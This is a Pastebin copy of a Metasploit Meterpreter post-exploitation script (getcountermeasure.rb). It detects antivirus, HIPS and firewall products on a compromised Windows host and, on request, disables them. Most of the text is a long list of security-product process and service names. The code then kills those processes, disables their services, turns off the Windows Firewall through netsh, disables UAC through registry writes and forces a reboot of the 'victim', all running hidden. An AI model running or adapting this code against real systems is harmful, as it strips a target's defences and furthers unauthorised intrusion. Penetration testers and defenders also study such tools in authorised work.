Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # $Id: getcountermeasure.rb 10277 2010-11-18 21:26:27Z darkoperator / spudgunman $
- #
- # Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
- # Provides also the option to kill the services and processes of detected products and disable the built-in firewall.
- # Provided by Carlos Perez at carlos_perez[at]darkoperator.com
- # Script Updated by Kelly Keeton<kellykeeton [at] hotmail>
- # Includes killav.rb process list by Jerome Athias <jerome.athias [at] free.fr>
- # Version: 0.2.5
- session = client
- @@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ],
- "-k" => [ false, "Kill any AV, HIPS and Third Party Firewall services and process found." ],
- "-d" => [ false, "Disable built in Firewall" ],
- "-u" => [ false, "Disable User Access Control (UAC)" ],
- "-r" => [ false, "Force a reboot of the victim" ]
- )
- def usage
- print_line("Getcountermeasure -- List (or optionally, kill) HIPS and AV")
- print_line("services and processes, for windows systems.")
- print_line("Show XP firewall rules, and display DEP and UAC policies")
- print(@@exec_opts.usage)
- raise Rex::Script::Completed
- end
- #------------------------------------------------------------------------------
- #list of processes, case is ignored at processing time
- avs = %W{
- _avp32.exe
- _avpcc.exe
- _avpm.exe
- a2adguard.exe
- a2adwizard.exe
- a2antidialer.exe
- a2cfg.exe
- a2cmd.exe
- a2free.exe
- a2guard.exe
- a2hijackfree.exe
- a2scan.exe
- a2service.exe
- a2start.exe
- a2sys.exe
- a2upd.exe
- aavgapi.exe
- aawservice.exe
- aawtray.exe
- ackwin32.exe
- adaware.exe
- ad-aware.exe
- advxdwin.exe
- ad-watch.exe
- agentsvr.exe
- agentw.exe
- alclient.exe
- alertsvc.exe
- alescan.exe
- alevir.exe
- alogserv.exe
- amon9x.exe
- anti-trojan.exe
- antivirus.exe
- ants.exe
- anvir.exe
- apimonitor.exe
- aplica32.exe
- apvxdwin.exe
- arr.exe
- ashdisp.exe
- ashmaisv.exe
- ashserv.exe
- ashwebsv.exe
- aswupdsv.exe
- atcon.exe
- atguard.exe
- atrack.exe
- atro55en.exe
- atupdater.exe
- atwatch.exe
- au.exe
- aupdate.exe
- autodown.exe
- auto-protect.nav80try.exe
- autotrace.exe
- autoupdate.exe
- avconsol.exe
- ave32.exe
- avgagent.exe
- avgamsvr.exe
- avgcc.exe
- avgcc32.exe
- avgchsvx.exe
- avgcsrvx.exe
- avgctrl.exe
- avgemc.exe
- avgemcx.exe
- AVGIDSAgent.exe
- AVGIDSMonitor.exe
- avgmfapx.exe
- avgnsx.exe
- avgnt.exe
- avgrsx.exe
- avgserv.exe
- avgserv9.exe
- avgtcpsv.exe
- avgtray.exe
- avguard.exe
- avgui.exe
- avgupsvc.exe
- avgw.exe
- avgwdsvc.exe
- avk.exe
- avkbar.exe
- avkpop.exe
- avkproxy.exe
- avkserv.exe
- avkservice.exe
- avktray
- avktray.exe
- avkwctl
- avkwctl.exe
- avkwctl9.exe
- avltmain.exe
- avmailc.exe
- avnt.exe
- avp.exe
- avp32.exe
- avpcc.exe
- avpdos32.exe
- avpm.exe
- avpmwrap.exe
- avptc32.exe
- avpupd.exe
- avsched32.exe
- avshadow.exe
- avsynmgr.exe
- avwebgrd.exe
- avwin.exe
- avwin95.exe
- avwinnt.exe
- avwupd.exe
- avwupd32.exe
- avwupsrv.exe
- avxmonitor9x.exe
- avxmonitornt.exe
- avxquar.exe
- avz.exe
- backweb.exe
- bargains.exe
- bd_professional.exe
- bdagent.exe
- bdmcon.exe
- bdnagent.exe
- bdss.exe
- bdswitch.exe
- beagle.exe
- belt.exe
- bidef.exe
- bidserver.exe
- bipcp.exe
- bipcpevalsetup.exe
- bisp.exe
- blackd.exe
- blackice.exe
- blink.exe
- blss.exe
- boc412.exe
- boc425.exe
- bocore.exe
- bootconf.exe
- bootwarn.exe
- borg2.exe
- bpc.exe
- brasil.exe
- bs120.exe
- bundle.exe
- bvt.exe
- cavrid.exe
- cavtray.exe
- ccapp.exe
- ccevtmgr.exe
- ccimscan.exe
- ccproxy.exe
- ccpwdsvc.exe
- ccpxysvc.exe
- ccsetmgr.exe
- ccSvcHst.exe
- cdp.exe
- cfd.exe
- cfgwiz.exe
- cfiadmin.exe
- cfiaudit.exe
- cfinet.exe
- cfinet32.exe
- cfp.exe
- clamd.exe
- clamservice.exe
- clamtray.exe
- claw95.exe
- claw95cf.exe
- clean.exe
- cleaner.exe
- cleaner3.exe
- cleanpc.exe
- click.exe
- cmdagent.exe
- cmesys.exe
- cmgrdian.exe
- cmon016.exe
- connectionmonitor.exe
- cpd.exe
- cpf.exe
- cpf9x206.exe
- cpfnt206.exe
- csinsmnt.exe
- ctrl.exe
- cv.exe
- cwnb181.exe
- cwntdwmo.exe
- datemanager.exe
- dcomx.exe
- dcsuserprot.exe
- defalert.exe
- defensewall.exe
- defensewall_serv.exe
- defscangui.exe
- defwatch.exe
- deputy.exe
- divx.exe
- dllcache.exe
- dllreg.exe
- doors.exe
- dpf.exe
- dpfsetup.exe
- dpps2.exe
- drwatson.exe
- drweb32.exe
- drwebupw.exe
- dssagent.exe
- dvp95.exe
- dvp95_0.exe
- ecengine.exe
- efpeadm.exe
- emsw.exe
- EngineServer.exe
- ent.exe
- esafe.exe
- escanhnt.exe
- escanv95.exe
- espwatch.exe
- ethereal.exe
- etrustcipe.exe
- evpn.exe
- exantivirus-cnet.exe
- exe.avxw.exe
- expert.exe
- explore.exe
- f-agnt95.exe
- FAMEH32.EXE
- fast.exe
- FCH32.EXE
- FIH32.exe
- findviru.exe
- firewall.exe
- FNRB32.exe
- ForceField.exe
- fpavupdm.exe
- fprot.exe
- f-prot.exe
- f-prot95.exe
- fp-win.exe
- fp-win_trial.exe
- FrameworkService.exe
- frw.exe
- fsaa.exe
- fsaua.exe
- fsav.exe
- fsav32.exe
- fsav530stbyb.exe
- fsav530wtbyb.exe
- fsav95.exe
- f-sched.exe
- fsdfwd.exe
- fsgk32.exe
- fsgk32st.exe
- fsguidll.exe
- FSLAUNCH.EXE
- FSM32.EXE
- FSMA32.EXE
- FSMB32.EXE
- fsqh.exe
- fssm32.exe
- f-stopw.exe
- fwservice.exe
- fwsrv.exe
- gator.exe
- gbmenu.exe
- gbpoll.exe
- generics.exe
- gmt.exe
- guard.exe
- guarddog.exe
- hacktracersetup.exe
- hbinst.exe
- hbsrv.exe
- hotactio.exe
- hotpatch.exe
- htlog.exe
- htpatch.exe
- hwpe.exe
- hxdl.exe
- hxiul.exe
- iamapp.exe
- iamserv.exe
- iamstats.exe
- iao.exe
- ibmasn.exe
- ibmavsp.exe
- icload95.exe
- icloadnt.exe
- icmon.exe
- icsupp95.exe
- icsuppnt.exe
- idle.exe
- idsinst.exe
- idslu.exe
- iedll.exe
- iedriver.exe
- iexplorer.exe
- iface.exe
- ifw2000.exe
- inetlnfo.exe
- inetupd.exe
- infus.exe
- infwin.exe
- init.exe
- intdel.exe
- intren.exe
- iomon98.exe
- irsetup.exe
- isafe.exe
- isignup.exe
- issvc.exe
- istsvc.exe
- ISWMGR.exe
- ISWSVC.exe
- jammer.exe
- jdbgmrg.exe
- jedi.exe
- kav.exe
- kavlite40eng.exe
- kavpers40eng.exe
- kavpf.exe
- kavss.exe
- kavsvc.exe
- kazza.exe
- keenvalue.exe
- kerio-pf-213-en-win.exe
- kerio-wrl-421-en-win.exe
- kerio-wrp-421-en-win.exe
- kernel32.exe
- killprocesssetup161.exe
- klswd.exe
- kpf4gui.exe
- kpf4ss.exe
- launcher.exe
- ldnetmon.exe
- ldpro.exe
- ldpromenu.exe
- ldscan.exe
- livesrv.exe
- lnetinfo.exe
- loader.exe
- localnet.exe
- lockdown.exe
- lockdown2000.exe
- lookout.exe
- lordpe.exe
- lpfw.exe
- lsetup.exe
- luall.exe
- luau.exe
- lucomserver.exe
- luinit.exe
- luspt.exe
- mantispm.exe
- mapisvc32.exe
- mcagent.exe
- mcdetect.exe
- mcmnhdlr.exe
- mcrdsvc.exe
- mcshield.exe
- mctool.exe
- McTray.exe
- mctskshd.exe
- mcupdate.exe
- mcvsrte.exe
- mcvsshld.exe
- md.exe
- mfevtps.exe
- mfin32.exe
- mfw2en.exe
- mfweng3.02d30.exe
- mgavrtcl.exe
- mgavrte.exe
- mghtml.exe
- mgui.exe
- minilog.exe
- mmod.exe
- monitor.exe
- moolive.exe
- mostat.exe
- mpfagent.exe
- mpfservice.exe
- mpftray.exe
- mrflux.exe
- msapp.exe
- msascui.exe
- msbb.exe
- msblast.exe
- mscache.exe
- msccn32.exe
- mscifapp.exe
- mscman.exe
- msconfig.exe
- msdm.exe
- msdos.exe
- msfwsvc.exe
- msgsys.exe
- msiexec16.exe
- msinfo32.exe
- mslaugh.exe
- msmgt.exe
- msmsgri32.exe
- mssmmc32.exe
- msssrv.exe
- mssys.exe
- msvxd.exe
- mu0311ad.exe
- mwatch.exe
- n32scanw.exe
- nav.exe
- navap.navapsvc.exe
- navapsvc.exe
- navapw32.exe
- navdx.exe
- navlogon.dll
- navlu32.exe
- navnt.exe
- navstub.exe
- navw32.exe
- navwnt.exe
- nc2000.exe
- ncinst4.exe
- ndd32.exe
- neomonitor.exe
- neowatchlog.exe
- netarmor.exe
- netd32.exe
- netinfo.exe
- netmon.exe
- netscanpro.exe
- netspyhunter-1.2.exe
- netstat.exe
- netutils.exe
- nisemsvr.exe
- nisserv.exe
- nisum.exe
- nmain.exe
- noads.exe
- nod32.exe
- nod32krn.exe
- nod32kui.exe
- nod32ra.exe
- normist.exe
- norton_internet_secu_3.0_407.exe
- notstart.exe
- npf40_tw_98_nt_me_2k.exe
- npfmessenger.exe
- npfmntor.exe
- nprotect.exe
- npscheck.exe
- npssvc.exe
- nsched32.exe
- nsmdtr.exe
- nssys32.exe
- nstask32.exe
- nsupdate.exe
- nt.exe
- ntrtscan.exe
- ntvdm.exe
- ntxconfig.exe
- nui.exe
- nupgrade.exe
- nvarch16.exe
- nvc95.exe
- nvsvc32.exe
- nwinst4.exe
- nwservice.exe
- nwtool16.exe
- oasclnt.exe
- ofcdog.exe
- ollydbg.exe
- onsrvr.exe
- opscan.exe
- optimize.exe
- ostronet.exe
- otfix.exe
- outpost.exe
- outpostinstall.exe
- outpostproinstall.exe
- paamsrv.exe
- padmin.exe
- panixk.exe
- patch.exe
- pavcl.exe
- pavfnsvr.exe
- pavproxy.exe
- pavsched.exe
- pavw.exe
- pcclient.exe
- pccpfw.exe
- pccwin98.exe
- pcfwallicon.exe
- pcip10117_0.exe
- pcscan.exe
- pdsetup.exe
- periscope.exe
- persfw.exe
- perswf.exe
- pf2.exe
- pfwadmin.exe
- pgmonitr.exe
- pingscan.exe
- platin.exe
- pop3trap.exe
- poproxy.exe
- popscan.exe
- portdetective.exe
- portmonitor.exe
- powerscan.exe
- ppinupdt.exe
- pptbc.exe
- ppvstop.exe
- prizesurfer.exe
- prmt.exe
- prmvr.exe
- procdump.exe
- processmonitor.exe
- procexplorerv1.0.exe
- programauditor.exe
- proport.exe
- protector.exe
- protectx.exe
- ProToolbarUpdate.exe
- pspf.exe
- purge.exe
- qconsole.exe
- qdcsfs.exe
- qserver.exe
- rapapp.exe
- rav7.exe
- rav7win.exe
- rav8win32eng.exe
- ray.exe
- rb32.exe
- rcsync.exe
- realmon.exe
- reged.exe
- regedit.exe
- regedt32.exe
- rescue.exe
- rescue32.exe
- rrguard.exe
- rshell.exe
- rtvscan.exe
- rtvscn95.exe
- rulaunch.exe
- run32dll.exe
- rundll.exe
- rundll16.exe
- ruxdll32.exe
- sadblock.exe
- safe.exe
- safeweb.exe
- sahagent.exe
- sandboxieserver.exe
- save.exe
- savenow.exe
- savscan.exe
- sbiectrl.exe
- sbiesvc.exe
- sbserv.exe
- scam32.exe
- scan32.exe
- scan95.exe
- ScanningProcess.exe
- scanpm.exe
- scfservice.exe
- sched.exe
- schedm.exe
- scheduler daemon.exe
- scrscan.exe
- sdhelp.exe
- serv95.exe
- setup_flowprotector_us.exe
- setupvameeval.exe
- sfc.exe
- SfCtlCom.exe
- sgbhp.exe
- sgmain.exe
- sgssfw32.exe
- sh.exe
- shellspyinstall.exe
- shn.exe
- showbehind.exe
- slee503.exe
- smartfix.exe
- smc.exe
- SmcGui.exe
- sms.exe
- smss32.exe
- snoopfreesvc.exe
- snoopfreeui.exe
- soap.exe
- sofi.exe
- sp_rsser.exe
- spbbcsvc.exe
- sperm.exe
- spf.exe
- sphinx.exe
- spoler.exe
- spoolcv.exe
- spoolsv32.exe
- spyblocker.exe
- spybotsd.exe
- spysweeper.exe
- spysweeperui.exe
- spywareguard.dll
- spywareterminatorshield.exe
- spyxx.exe
- srexe.exe
- srng.exe
- ss3edit.exe
- ssg_4104.exe
- ssgrate.exe
- ssu.exe
- st2.exe
- start.exe
- stcloader.exe
- steganos5.exe
- stinger.exe
- supftrl.exe
- support.exe
- supporter5.exe
- svc.exe
- svchostc.exe
- svchosts.exe
- svshost.exe
- swdoctor.exe
- sweep95.exe
- swupdate.exe
- symlcsvc.exe
- symproxysvc.exe
- symtray.exe
- symundo.exe
- symwsc.exe
- symwscno.exe
- sysedit.exe
- system.exe
- system32.exe
- sysupd.exe
- taskmg.exe
- taskmgr.exe
- taskmo.exe
- taskmon.exe
- taumon.exe
- tbscan.exe
- tc.exe
- tca.exe
- tcguard.exe
- tcm.exe
- tds2-98.exe
- tds2-nt.exe
- tds-3.exe
- teatimer.exe
- teekids.exe
- tfak.exe
- tfak5.exe
- tgbbob.exe
- tgbob.exe
- tgbstarter.exe
- titanin.exe
- titaninxp.exe
- TMBMSRV.exe
- TmPFw.exe
- TmProxy.exe
- tracert.exe
- trickler.exe
- trjscan.exe
- trjsetup.exe
- trojantrap3.exe
- tsadbot.exe
- tsatudt.exe
- tvmd.exe
- tvtmd.exe
- UFSeAgnt.exe
- umxagent.exe
- umxcfg.exe
- umxfwhlp.exe
- umxlu.exe
- umxpol.exe
- umxtray.exe
- undoboot.exe
- updat.exe
- update.exe
- UpdaterUI.exe
- upgrad.exe
- usrprmpt.exe
- utpost.exe
- vbcmserv.exe
- vbcons.exe
- vbust.exe
- vbwin9x.exe
- vbwinntw.exe
- vcsetup.exe
- vet32.exe
- vet95.exe
- vetmsg.exe
- vetmsg9x.exe
- vettray.exe
- vfsetup.exe
- vir-help.exe
- virusmdpersonalfirewall.exe
- vnlan300.exe
- vnpc3000.exe
- vpc32.exe
- vpc42.exe
- vpfw30s.exe
- vptray.exe
- vsaccess.exe
- vscan40.exe
- vscenu6.02d30.exe
- vsched.exe
- vsecomr.exe
- vshwin32.exe
- vsisetup.exe
- vsmain.exe
- vsmon.exe
- vsserv.exe
- vsstat.exe
- VsTskMgr.exe
- vswin9xe.exe
- vswinntse.exe
- vswinperse.exe
- w32dsm89.exe
- w9x.exe
- watchdog.exe
- wcantispy.exe
- webdav.exe
- webscanx.exe
- webtrap.exe
- wfindv32.exe
- whoswatchingme.exe
- wimmun32.exe
- win32.exe
- win32us.exe
- winactive.exe
- win-bugsfix.exe
- window.exe
- windows.exe
- wininetd.exe
- wininitx.exe
- winlogin.exe
- winmain.exe
- winnet.exe
- winpatrol.exe
- winpatrolex.exe
- winppr32.exe
- winrecon.exe
- winservn.exe
- winssk32.exe
- winstart.exe
- winstart001.exe
- wintsk32.exe
- winupdate.exe
- wkufind.exe
- wnad.exe
- wnt.exe
- wradmin.exe
- wrctrl.exe
- wrsssdk.exe
- wsbgate.exe
- wupdater.exe
- wupdt.exe
- wyvernworksfirewall.exe
- xcommsvr.exe
- xfr.exe
- xp-antispy.exe
- xpf202en.exe
- zapro.exe
- zapsetup3001.exe
- zatutor.exe
- zegarynka.exe
- zlclient.exe
- zonalm2601.exe
- zonealarm.exe
- }
- #-------------------------------------------------------------------------------
- #list of services, this is the "service name" NOT the "display name" also note
- #if the service has a 'space' to escape it first "My String" == "My\ String"
- #case is ignored at processing time
- avservices = %W{
- avg9emc
- avg9wd
- AVGIDSAgent
- avgwd
- ccEvtMgr
- ccSetMgr
- FSAUA
- FSDFWD
- FSGKHS
- FSMA
- IswSvc
- McAfeeEngineService
- McAfeeFramework
- McShield
- McTaskManager
- mfevtp
- MsMpSvc
- SfCtlCom
- SmcService
- SNAC
- Symantec\ AntiVirus
- TMBMServer
- TmPfw
- TmProxy
- vsmon
- WinDefend
- wscsvc
- }
- #-------------------------------------------------------------------------------
- # Check for the presence of AV, HIPS and Third Party firewall and/or kill the
- # services and processes associated with it
- def check(session,avs,avservices,killbit)
- spacer = "-------------------------------------------------------------------"
- if (killbit)
- print_error("\tTarget may require script re-ran and/or Reboot to fully remove countermeasure...")
- end
- #we need a list of services first
- r = session.sys.process.execute("cmd.exe /c tasklist /svc /FO CSV", nil, {'Hidden' => 'true', 'Channelized' => true})
- while(raw = r.channel.read)
- raw.gsub!(/\r\n?/,',') #replace nasty CRLF with ,
- raw.gsub!('"','') #remove some "" that are here and there
- svclist = raw.downcase.split(",") #make array for parsing
- end
- r.channel.close
- r.close
- #-----info or kill service
- avservicesclean = avservices.map{|i| i.downcase} #convert our array to downcase for later downcase processing
- print_status(spacer)
- print_status("Checking for Services...")
- svclist.each do |x|
- if (avservicesclean.index(x))
- print_status("\tPossible countermeasure service found #{x}")
- if (killbit)
- begin #error handle for service killing
- print_status("\t\tKilling service for countermeasure.....")
- r = session.sys.process.execute("cmd.exe /c sc config #{x} start= disabled & net stop #{x}", nil, {'Hidden' => 'true', 'Channelized' => true})
- rescue Exception => e
- print_error("\t\t#{e}")
- end
- end
- end
- end
- r.channel.close
- r.close
- #-----info or kill process
- avsclean = avs.map{|i| i.downcase} #convert our array to downcase for later downcase processing
- print_status(spacer)
- print_status("Checking for Processes...")
- session.sys.process.get_processes().each do |x|
- if (avsclean.index(x['name'].downcase))
- print_status("\tPossible countermeasure process found #{x['name']} #{x['path']}")
- if (killbit)
- begin #error handle for process killing
- print_status("\t\tKilling process for countermeasure.....")
- session.sys.process.kill(x['pid'])
- rescue Exception => e
- print_error("\t\t#{e}")
- end
- end
- end
- end
- print_status(spacer)
- end
- #-------------------------------------------------------------------------------
- # Get the configuration and/or disable the built in Windows Firewall
- def checklocalfw(session,killfw,winvr)
- print_status("Getting Windows Built in Firewall configuration...")
- opmode = ""
- #----
- if winvr !~ /Windows 7/
- if (killfw)
- print_status("\tDisabling Built in Firewall.....")
- f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true})
- while(d = f.channel.read)
- if d =~ /The requested operation requires elevation./
- print_status("\tUAC or Insufficient permissions prevented the disabling of Firewall")
- end
- end
- f.channel.close
- f.close
- else
- r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true})
- while(d = r.channel.read)
- opmode << d
- end
- r.channel.close
- r.close
- end
- end
- if winvr =~ /Windows 7/ #?Windows Vista|
- if (killfw)
- print_status("\tDisabling Built in Firewall.....")
- f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true})
- while(d = f.channel.read)
- if d =~ /The requested operation requires elevation./
- print_status("\tUAC or Insufficient permissions prevented the disabling of Firewall")
- end
- end
- f.channel.close
- f.close
- else
- r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true})
- while(d = r.channel.read)
- opmode << d
- end
- r.channel.close
- r.close
- end
- end
- #print results
- opmode.split("\n").each do |o|
- print_status("\t#{o}")
- end
- end
- #-------------------------------------------------------------------------------
- # Function for getting the current DEP Policy on the Windows Target
- def checkdep(session)
- spacer = "-------------------------------------------------------------------"
- tmpout = ""
- depmode = ""
- # Expand environment %TEMP% variable
- tmp = session.fs.file.expand_path("%TEMP%")
- # Create random name for the wmic output
- wmicfile = sprintf("%.5d",rand(100000))
- wmicout = "#{tmp}\\#{wmicfile}"
- print_status(spacer)
- print_status("Checking DEP Support Policy...")
- r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicout} OS Get DataExecutionPrevention_SupportPolicy", nil, {'Hidden' => true})
- sleep(2)
- r.close
- r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true})
- while(d = r.channel.read)
- tmpout << d
- end
- r.close
- session.sys.process.execute("cmd.exe /c del #{wmicout}", nil, {'Hidden' => true})
- depmode = tmpout.scan(/(\d)/)
- if depmode.to_s == "0"
- print_status("\tDEP is off for the whole system.")
- elsif depmode.to_s == "1"
- print_status("\tFull DEP coverage for the whole system with no exceptions.")
- elsif depmode.to_s == "2"
- print_status("\tDEP is limited to Windows system binaries.")
- elsif depmode.to_s == "3"
- print_status("\tDEP is on for all programs and services.")
- end
- end
- #-------------------------------------------------------------------------------
- #function to check or kill UAC
- def checkuac(session,killuc)
- spacer = "-------------------------------------------------------------------"
- print_status(spacer)
- print_status("Checking if UAC is enabled ...")
- key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
- root_key, base_key = session.sys.registry.splitkey(key)
- value = "EnableLUA"
- open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
- v = open_key.query_value(value)
- if v.data == 1
- print_status("\tUAC is Enabled")
- if (killuc)
- begin
- print_status("\tKilling UAC countermeasure.....")
- kill1="C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f"
- kill2="C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
- session.sys.process.execute("cmd.exe /c #{kill1}", nil, {'Hidden' => true})
- session.sys.process.execute("cmd.exe /c #{kill2}", nil, {'Hidden' => true})
- #try different method
- open_key.set_value(value, session.sys.registry.type2str("REG_DWORD"), 0)
- rescue Exception => e
- print_error("\t\t#{e}")
- end
- end
- else
- print_status("\tUAC is Disabled")
- end
- end
- def checkreboot(killpc,winvr)
- if winvr =~ /Windows Vista|Windows 7/
- if (killpc)
- print_error("\tRebooting Victim PC your session will die.....")
- session.sys.process.execute("cmd.exe /c shutdown /l /r /f", nil, {'Hidden' => true})
- elsif winvr !~ /Windows Vista|Windows 7/
- print_error("\tRebooting Victim PC your session will die.....")
- session.sys.process.execute("cmd.exe /c shutdown -l -r -f", nil, {'Hidden' => true})
- end
- end
- end
- ################## MAIN ##################
- killbt = false
- killfw = false
- killuac = false
- killpc = false
- @@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-k"
- killbt = true
- when "-d"
- killfw = true
- when "-u"
- killuac = true
- when "-r"
- killpc = true
- when "-h"
- usage
- end
- }
- # get the version of windows
- if client.platform =~ /win32|win64/
- wnvr = session.sys.config.sysinfo["OS"]
- print_status("Running Getcountermeasure on the target...")
- check(session,avs,avservices,killbt)
- #print_error(winvr)
- if wnvr !~ /Windows 2000/
- checklocalfw(session,killfw,wnvr)
- checkdep(session)
- checkreboot(killpc,wnvr)
- end
- if wnvr =~ /Windows Vista|Windows 7/
- checkuac(session,killuac)
- end
- else
- print_error("This version of Meterpreter is not supported with this Script!")
- print_status("Detected platform #{client.platform}")
- raise Rex::Script::Completed
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement